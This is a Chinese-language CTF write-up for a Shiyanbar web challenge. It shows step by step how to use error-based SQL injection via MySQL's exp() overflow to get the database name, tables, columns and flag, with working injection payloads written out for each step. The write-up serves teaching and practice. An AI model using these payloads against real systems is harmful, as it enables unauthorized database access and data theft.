实验吧Web-易-简单的sql注入之3(报错的sql盲注之exp)

题目提示是报错注入,于是就用盲注技巧来注入。

这里注入时发现floor,extractvalue,updatexml被吃掉了,用exp可以注入成功。(记住大小写绕过等技巧)

1.爆库

' or exp(~(select * from(select database())a))#
这里最后面的a处可为别的字母,且必须要有

实验吧Web-易-简单的sql注入之3(报错的sql盲注之exp)_第1张图片

可以看到库名为web1。

2,爆表

' or exp(~(select * from(select group_concat(table_name) from information_schema.tables where table_schema=database())a))#
或者
' or exp(~(select * from(select group_concat(table_name) from information_schema.tables where table_schema='web1')a))#

实验吧Web-易-简单的sql注入之3(报错的sql盲注之exp)_第2张图片

 flag应该在表flag中。

3.爆列名

' or exp(~(select * from(select group_concat(column_name) from information_schema.columns where table_name='flag')a))#

实验吧Web-易-简单的sql注入之3(报错的sql盲注之exp)_第3张图片

 我们要的列名出来了

4.爆内容

' or exp(~(select * from(select flag from flag)a))#

就拿到flag了。

 

这篇文章可做参考:https://www.cnblogs.com/caizhiren/p/7846917.html

你可能感兴趣的:(sql注入,实验吧web,实验吧,报错的SQL注入)